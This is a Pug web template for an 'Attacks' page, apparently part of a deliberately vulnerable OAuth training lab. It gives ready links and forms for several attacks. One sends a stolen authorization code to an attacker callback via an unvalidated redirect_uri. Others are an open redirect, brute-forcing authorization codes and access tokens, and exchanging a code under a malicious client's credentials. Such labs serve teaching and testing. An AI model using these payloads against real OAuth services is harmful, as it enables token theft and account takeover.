extends layout

block content
  .container
    h2 Attacks
    h3 Unvalidated Redirect URL in authorization endpoint
    ul
      li 
        | Steal authorization code: Please click 
        | <a href="http://gallery:3005/oauth/authorize?response_type=code&redirect_uri=http%3A%2F%2Fattacker%3A1337%2Fcallback&scope=view_gallery&client_id=photoprint">here</a>
        | .
      li 
        | Open redirect to synopsys.com if clients are auto-approved: Please click 
        | <a href="http://gallery:3005/oauth/authorize?response_type=code&redirect_uri=http%3A%2F%2Fwww.synopsys.com&scope=view_gallery&client_id=photoprint">here</a>
        | .
    h3 Weak Authorization Codes
    p 
      | Bruteforce authorization codes at the token endpoint 
      | <a href="http://attacker:1337/guessauthzcode">here</a>.

    h3 Exchange authorization code with other credentials
    p 
      form(method='POST' action='/exchangewithothercreds')
        div.form-group
          label(for='code') Authorization Code:
          input#code.form-control(type='text', placeholder='15637', value='15637',name='code')
        div.form-group
          label(for='clientid') Client ID:
          input#clientid.form-control(type='text', placeholder='maliciousclient', value='maliciousclient', name='clientid')
        div.form-group
          label(for='secret') Client Secret:
          input#secret.form-control(type='password', placeholder='secret',  value='secret',name='secret')
        button.btn.btn-primary(type='submit') Submit

    h3 Weak handle-based access tokens
    p
       | Bruteforce access tokens at the resource server 
       | <a href="http://attacker:1337/guessaccesstokenatresourceserver">here</a>.
